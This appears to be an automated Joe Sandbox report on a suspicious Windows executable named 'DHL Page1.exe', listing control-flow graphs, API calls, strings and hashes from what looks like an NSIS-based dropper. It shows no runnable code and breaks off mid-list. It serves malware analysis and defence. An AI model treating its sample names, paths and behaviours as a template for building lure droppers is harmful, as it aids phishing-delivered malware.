                                              control_flow_graph 0 40346c-40349f SetErrorMode GetVersion 1 4034a1-4034a9 call 40660e 0->1 2 4034b2 0->2 1->2 8 4034ab 1->8 3 4034b7-4034cb call 40659e lstrlenA 2->3 9 4034cd-403541 call 40660e * 2 #17 OleInitialize SHGetFileInfoW call 406234 GetCommandLineW call 406234 GetModuleHandleW 3->9 8->2 18 403543-40354a 9->18 19 40354b-403565 call 405c15 CharNextW 9->19 18->19 22 40356b-403571 19->22 23 40367c-403696 GetTempPathW call 40343b 19->23 24 403573-403578 22->24 25 40357a-40357e 22->25 32 403698-4036b6 GetWindowsDirectoryW lstrcatW call 40343b 23->32 33 4036ee-403708 DeleteFileW call 402ed5 23->33 24->24 24->25 27 403580-403584 25->27 28 403585-403589 25->28 27->28 30 403648-403655 call 405c15 28->30 31 40358f-403595 28->31 46 403657-403658 30->46 47 403659-40365f 30->47 36 4035b0-4035e9 31->36 37 403597-40359f 31->37 32->33 52 4036b8-4036e8 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40343b 32->52 48 4037b9-4037c9 call 40398b OleUninitialize 33->48 49 40370e-403714 33->49 43 403606-403640 36->43 44 4035eb-4035f0 36->44 41 4035a1-4035a4 37->41 42 4035a6 37->42 41->36 41->42 42->36 43->30 51 403642-403646 43->51 44->43 50 4035f2-4035fa 44->50 46->47 47->22 55 403665 47->55 69 4038ef-4038f5 48->69 70 4037cf-4037df call 405979 ExitProcess 48->70 56 4037a9-4037b0 call 403a7d 49->56 57 40371a-403725 call 405c15 49->57 59 403601 50->59 60 4035fc-4035ff 50->60 51->30 53 403667-403675 call 406234 51->53 52->33 52->48 62 40367a 53->62 55->62 68 4037b5 56->68 73 403773-40377d 57->73 74 403727-40375c 57->74 59->43 60->43 60->59 62->23 68->48 71 403973-40397b 69->71 72 4038f7-40390d GetCurrentProcess OpenProcessToken 69->72 79 403981-403985 ExitProcess 71->79 80 40397d 71->80 76 403943-403951 call 40660e 72->76 77 40390f-40393d LookupPrivilegeValueW AdjustTokenPrivileges 72->77 81 4037e5-4037f9 call 4058fc lstrcatW 73->81 82 40377f-40378d call 405cf0 73->82 78 40375e-403762 74->78 96 403953-40395d 76->96 97 40395f-40396a ExitWindowsEx 76->97 77->76 87 403764-403769 78->87 88 40376b-40376f 78->88 80->79 94 403806-403820 lstrcatW lstrcmpiW 81->94 95 4037fb-403801 lstrcatW 81->95 82->48 93 40378f-4037a5 call 406234 * 2 82->93 87->88 92 403771 87->92 88->78 88->92 92->73 93->56 94->48 99 403822-403825 94->99 95->94 96->97 100 40396c-40396e call 40140b 96->100 97->71 97->100 102 403827-40382c call 405862 99->102 103 40382e call 4058df 99->103 100->71 111 403833-403841 SetCurrentDirectoryW 102->111 103->111 112 403843-403849 call 406234 111->112 113 40384e-403877 call 406234 111->113 112->113 117 40387c-403898 call 406256 DeleteFileW 113->117 120 4038d9-4038e1 117->120 121 40389a-4038aa CopyFileW 117->121 120->117 123 4038e3-4038ea call 4060d5 120->123 121->120 122 4038ac-4038cc call 4060d5 call 406256 call 405914 121->122 122->120 132 4038ce-4038d5 CloseHandle 122->132 123->48 132->120
                                              APIs
                                              • SetErrorMode.KERNELBASE ref: 0040348F
                                              • GetVersion.KERNEL32 ref: 00403495
                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034BE
                                              • #17.COMCTL32(00000007,00000009), ref: 004034E1
                                              • OleInitialize.OLE32(00000000), ref: 004034E8
                                              • SHGetFileInfoW.SHELL32(0042B248,00000000,?,000002B4,00000000), ref: 00403504
                                              • GetCommandLineW.KERNEL32(00433F20,NSIS Error), ref: 00403519
                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\DHL Page1.exe",00000000), ref: 0040352C
                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHL Page1.exe",00000020), ref: 00403553
                                                • Part of subcall function 0040660E: GetModuleHandleA.KERNEL32(?,00000020,?,004034D5,00000009), ref: 00406620
                                                • Part of subcall function 0040660E: GetProcAddress.KERNEL32(00000000,?), ref: 0040663B
                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040368D
                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040369E
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004036AA
                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004036BE
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004036C6
                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004036D7
                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004036DF
                                              • DeleteFileW.KERNELBASE(1033), ref: 004036F3
                                                • Part of subcall function 00406234: lstrcpynW.KERNEL32(?,?,00000400,00403519,00433F20,NSIS Error), ref: 00406241
                                              • OleUninitialize.OLE32(?), ref: 004037BE
                                              • ExitProcess.KERNEL32 ref: 004037DF
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL Page1.exe",00000000,?), ref: 004037F2
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL Page1.exe",00000000,?), ref: 00403801
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL Page1.exe",00000000,?), ref: 0040380C
                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL Page1.exe",00000000,?), ref: 00403818
                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403834
                                              • DeleteFileW.KERNEL32(0042AA48,0042AA48,?,00436000,?), ref: 0040388E
                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\DHL Page1.exe,0042AA48,?), ref: 004038A2
                                              • CloseHandle.KERNEL32(00000000,0042AA48,0042AA48,?,0042AA48,00000000), ref: 004038CF
                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 004038FE
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403905
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040391A
                                              • AdjustTokenPrivileges.ADVAPI32 ref: 0040393D
                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403962
                                              • ExitProcess.KERNEL32 ref: 00403985
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                              • String ID: "C:\Users\user\Desktop\DHL Page1.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL Page1.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                              • API String ID: 2488574733-2975922820
                                              • Opcode ID: 2da3462b9ec5dddd6da4cee4044f7adbee930a5b9da6a655544961324f182cec
                                              • Instruction ID: 11d77c6df3e33b162af4eec1f1e25d37dd2296380ae56d2b6bbcb8daeeaa14dd
                                              • Opcode Fuzzy Hash: 2da3462b9ec5dddd6da4cee4044f7adbee930a5b9da6a655544961324f182cec
                                              • Instruction Fuzzy Hash: DFD1F371100310ABE3207F759D45A2B3AA9EB8070AF11483FF981B62E1DB7D89558B6E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 133 4054d2-4054ed 134 4054f3-4055ba GetDlgItem * 3 call 40432d call 404c30 GetClientRect GetSystemMetrics SendMessageW * 2 133->134 135 40567c-405683 133->135 157 4055d8-4055db 134->157 158 4055bc-4055d6 SendMessageW * 2 134->158 137 405685-4056a7 GetDlgItem CreateThread CloseHandle 135->137 138 4056ad-4056ba 135->138 137->138 140 4056d8-4056e2 138->140 141 4056bc-4056c2 138->141 145 4056e4-4056ea 140->145 146 405738-40573c 140->146 143 4056c4-4056d3 ShowWindow * 2 call 40432d 141->143 144 4056fd-405706 call 40435f 141->144 143->140 154 40570b-40570f 144->154 151 405712-405722 ShowWindow 145->151 152 4056ec-4056f8 call 4042d1 145->152 146->144 149 40573e-405744 146->149 149->144 159 405746-405759 SendMessageW 149->159 155 405732-405733 call 4042d1 151->155 156 405724-40572d call 405393 151->156 152->144 155->146 156->155 162 4055eb-405602 call 4042f8 157->162 163 4055dd-4055e9 SendMessageW 157->163 158->157 164 40585b-40585d 159->164 165 40575f-40578a CreatePopupMenu call 406256 AppendMenuW 159->165 170 405604-405618 ShowWindow 162->170 171 405638-405659 GetDlgItem SendMessageW 162->171 163->162 164->154 172 40578c-40579c GetWindowRect 165->172 173 40579f-4057b4 TrackPopupMenu 165->173 174 405627 170->174 175 40561a-405625 ShowWindow 170->175 171->164 177 40565f-405677 SendMessageW * 2 171->177 172->173 173->164 176 4057ba-4057d1 173->176 178 40562d-405633 call 40432d 174->178 175->178 179 4057d6-4057f1 SendMessageW 176->179 177->164 178->171 179->179 180 4057f3-405816 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->180 182 405818-40583f SendMessageW 180->182 182->182 183 405841-405855 GlobalUnlock SetClipboardData CloseClipboard 182->183 183->164
                                              APIs
                                              • GetDlgItem.USER32(?,00000403), ref: 00405530
                                              • GetDlgItem.USER32(?,000003EE), ref: 0040553F
                                              • GetClientRect.USER32(?,?), ref: 0040557C
                                              • GetSystemMetrics.USER32(00000002), ref: 00405583
                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004055A4
                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004055B5
                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004055C8
                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004055D6
                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004055E9
                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040560B
                                              • ShowWindow.USER32(?,00000008), ref: 0040561F
                                              • GetDlgItem.USER32(?,000003EC), ref: 00405640
                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405650
                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405669
                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405675
                                              • GetDlgItem.USER32(?,000003F8), ref: 0040554E
                                                • Part of subcall function 0040432D: SendMessageW.USER32(00000028,?,?,00404159), ref: 0040433B
                                              • GetDlgItem.USER32(?,000003EC), ref: 00405692
                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005466,00000000), ref: 004056A0
                                              • CloseHandle.KERNELBASE(00000000), ref: 004056A7
                                              • ShowWindow.USER32(00000000), ref: 004056CB
                                              • ShowWindow.USER32(000103DC,00000008), ref: 004056D0
                                              • ShowWindow.USER32(00000008), ref: 0040571A
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040574E
                                              • CreatePopupMenu.USER32 ref: 0040575F
                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405773
                                              • GetWindowRect.USER32(?,?), ref: 00405793
                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057AC
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057E4
                                              • OpenClipboard.USER32(00000000), ref: 004057F4
                                              • EmptyClipboard.USER32 ref: 004057FA
                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405806
                                              • GlobalLock.KERNEL32(00000000), ref: 00405810
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405824
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405844
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040584F
                                              • CloseClipboard.USER32 ref: 00405855
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                              • String ID: {
                                              • API String ID: 590372296-366298937
                                              • Opcode ID: 02917508575c5947e81d9450990c89721220ca0e3d7cab6b387563a8846f8888
                                              • Instruction ID: dc7bbf886be487b306171a2164c28a2220a031177b651aae269613cc5d4e9b95
                                              • Opcode Fuzzy Hash: 02917508575c5947e81d9450990c89721220ca0e3d7cab6b387563a8846f8888
                                              • Instruction Fuzzy Hash: 20B137B1900608FFDB11AF60DD85EAE7B79FB08355F00803AFA45B61A0CB755A51DF68

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 430 406256-406261 431 406263-406272 430->431 432 406274-40628a 430->432 431->432 433 406290-40629d 432->433 434 4064a2-4064a8 432->434 433->434 435 4062a3-4062aa 433->435 436 4064ae-4064b9 434->436 437 4062af-4062bc 434->437 435->434 439 4064c4-4064c5 436->439 440 4064bb-4064bf call 406234 436->440 437->436 438 4062c2-4062ce 437->438 441 4062d4-406310 438->441 442 40648f 438->442 440->439 444 406430-406434 441->444 445 406316-406321 GetVersion 441->445 446 406491-40649b 442->446 447 40649d-4064a0 442->447 450 406436-40643a 444->450 451 406469-40646d 444->451 448 406323-406327 445->448 449 40633b 445->449 446->434 447->434 448->449 454 406329-40632d 448->454 457 406342-406349 449->457 455 40644a-406457 call 406234 450->455 456 40643c-406448 call 40617b 450->456 452 40647c-40648d lstrlenW 451->452 453 40646f-406477 call 406256 451->453 452->434 453->452 454->449 460 40632f-406333 454->460 464 40645c-406465 455->464 456->464 462 40634b-40634d 457->462 463 40634e-406350 457->463 460->449 467 406335-406339 460->467 462->463 465 406352-40636f call 406101 463->465 466 40638c-40638f 463->466 464->452 469 406467 464->469 474 406374-406378 465->474 471 406391-40639d GetSystemDirectoryW 466->471 472 40639f-4063a2 466->472 467->457 473 406428-40642e call 4064c8 469->473 475 406411-406415 471->475 476 4063a4-4063b2 GetWindowsDirectoryW 472->476 477 40640d-40640f 472->477 473->452 478 406417-40641b 474->478 479 40637e-406387 call 406256 474->479 475->473 475->478 476->477 477->475 480 4063b4-4063be 477->480 478->473 483 40641d-406423 lstrcatW 478->483 479->475 485 4063c0-4063c3 480->485 486 4063d8-4063ee SHGetSpecialFolderLocation 480->486 483->473 485->486 490 4063c5-4063cc 485->490 487 4063f0-406407 SHGetPathFromIDListW CoTaskMemFree 486->487 488 406409 486->488 487->475 487->488 488->477 491 4063d4-4063d6 490->491 491->475 491->486
                                              APIs
                                              • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,?,004053CA,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000), ref: 00406319
                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406397
                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004063AA
                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004063E6
                                              • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004063F4
                                              • CoTaskMemFree.OLE32(?), ref: 004063FF
                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406423
                                              • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,?,004053CA,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000), ref: 0040647D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                              • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                              • API String ID: 900638850-2121271985
                                              • Opcode ID: 00aadd241932dadc362f6b834cbb9b2880397ab50fd9815523d8905ab181eb5a
                                              • Instruction ID: b056fad8d3bd0605b9c0c77c9c79e7764d1f24d849fb2afebe56385b15959c95
                                              • Opcode Fuzzy Hash: 00aadd241932dadc362f6b834cbb9b2880397ab50fd9815523d8905ab181eb5a
                                              • Instruction Fuzzy Hash: B4614431A00114AADF209F68CD40AAE37A5BF54314F16C13FE947BA2D0D77D9AA1CB9D
                                              APIs
                                                • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                              • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                              • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                              • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                              • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                              • GlobalFree.KERNEL32(?), ref: 10001D83
                                              • GlobalFree.KERNEL32(?), ref: 10001D88
                                              • GlobalFree.KERNEL32(?), ref: 10001D8D
                                              • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                              • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123239636452.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000000.00000002.123239605456.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.123239665702.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.123239691897.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_10000000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Global$Free$lstrcpy$Alloc
                                              • String ID:
                                              • API String ID: 4227406936-0
                                              • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                              • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                              • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                              • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 692 405a25-405a4b call 405cf0 695 405a64-405a6b 692->695 696 405a4d-405a5f DeleteFileW 692->696 698 405a6d-405a6f 695->698 699 405a7e-405a8e call 406234 695->699 697 405be1-405be5 696->697 700 405a75-405a78 698->700 701 405b8f-405b94 698->701 705 405a90-405a9b lstrcatW 699->705 706 405a9d-405a9e call 405c34 699->706 700->699 700->701 701->697 703 405b96-405b99 701->703 707 405ba3-405bab call 406577 703->707 708 405b9b-405ba1 703->708 709 405aa3-405aa7 705->709 706->709 707->697 716 405bad-405bc1 call 405be8 call 4059dd 707->716 708->697 712 405ab3-405ab9 lstrcatW 709->712 713 405aa9-405ab1 709->713 715 405abe-405ada lstrlenW FindFirstFileW 712->715 713->712 713->715 717 405ae0-405ae8 715->717 718 405b84-405b88 715->718 732 405bc3-405bc6 716->732 733 405bd9-405bdc call 405393 716->733 721 405b08-405b1c call 406234 717->721 722 405aea-405af2 717->722 718->701 720 405b8a 718->720 720->701 734 405b33-405b3e call 4059dd 721->734 735 405b1e-405b26 721->735 724 405af4-405afc 722->724 725 405b67-405b77 FindNextFileW 722->725 724->721 728 405afe-405b06 724->728 725->717 731 405b7d-405b7e FindClose 725->731 728->721 728->725 731->718 732->708 738 405bc8-405bd7 call 405393 call 4060d5 732->738 733->697 745 405b40-405b43 734->745 746 405b5f-405b62 call 405393 734->746 735->725 739 405b28-405b31 call 405a25 735->739 738->697 739->725 748 405b45-405b55 call 405393 call 4060d5 745->748 749 405b57-405b5d 745->749 746->725 748->725 749->725
                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,754F3420,754F2EE0,00000000), ref: 00405A4E
                                              • lstrcatW.KERNEL32(0042F290,\*.*,0042F290,?,?,754F3420,754F2EE0,00000000), ref: 00405A96
                                              • lstrcatW.KERNEL32(?,0040A014,?,0042F290,?,?,754F3420,754F2EE0,00000000), ref: 00405AB9
                                              • lstrlenW.KERNEL32(?,?,0040A014,?,0042F290,?,?,754F3420,754F2EE0,00000000), ref: 00405ABF
                                              • FindFirstFileW.KERNELBASE(0042F290,?,?,?,0040A014,?,0042F290,?,?,754F3420,754F2EE0,00000000), ref: 00405ACF
                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B6F
                                              • FindClose.KERNEL32(00000000), ref: 00405B7E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                              • String ID: "C:\Users\user\Desktop\DHL Page1.exe"$\*.*
                                              • API String ID: 2035342205-2628486231
                                              • Opcode ID: 790878d1883c619e2d90dcb5f02a42ffccef8b8de064fb120c2f00b1d1973b2f
                                              • Instruction ID: 7272181c32e1f057aeb14691d6a2555d11cfe5c650e93729dd2f0f8f1d0f80c1
                                              • Opcode Fuzzy Hash: 790878d1883c619e2d90dcb5f02a42ffccef8b8de064fb120c2f00b1d1973b2f
                                              • Instruction Fuzzy Hash: 7E41D430900A14AACB21AB659C89EBF7678EF41728F24417FF801761D1D77C7981CE6E
                                              APIs
                                              • CoCreateInstance.OLE32(004085F0,?,?,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                              Strings
                                              • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage, xrefs: 004021C3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
